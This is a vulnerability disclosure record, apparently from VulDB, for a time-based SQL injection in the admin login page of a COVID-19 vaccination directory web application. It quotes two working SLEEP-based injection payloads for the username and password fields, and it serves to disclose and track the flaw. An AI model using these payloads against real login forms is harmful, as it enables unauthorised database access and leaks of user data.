| Title | SQL injection vulnerability exists in txtpassword and txtusername parameter of design-and-implementation-covid-19-directory-vacination |
|---|
| Description | SQL injection vulnerability exists in txtpassword and txtusername parameter of /admin/login.php file of design-and-implementation-covid-19-directory-vacination
Important user data or system data may be leaked and system security may be compromised
The environment is secure and the information can be used by malicious users.
Payload: txtusername=admin&txtpassword=123456' AND (SELECT 9886 FROM (SELECT(SLEEP(5)))oFWj)-- FIko&btnlogin=
or txtusername=admin' AND (SELECT 1895 FROM (SELECT(SLEEP(5)))ocUe)-- DEnO&txtpassword=123456&btnlogin= |
|---|
| Source | ⚠️ https://github.com/E1CHO/cve_hub/blob/main/covid-19-vaccination%20vlun%20pdf/covid-19-vaccination%20sql(6).pdf |
|---|
| User | SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936) |
|---|
| Submission | 03/11/2023 15:56 (3 years ago) |
|---|
| Moderation | 03/11/2023 18:39 (3 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 222851 [SourceCodester Design and Implementation of Covid-19 Directory on Vaccination System /admin/login.php sql injection] |
|---|
| Points | 20 |
|---|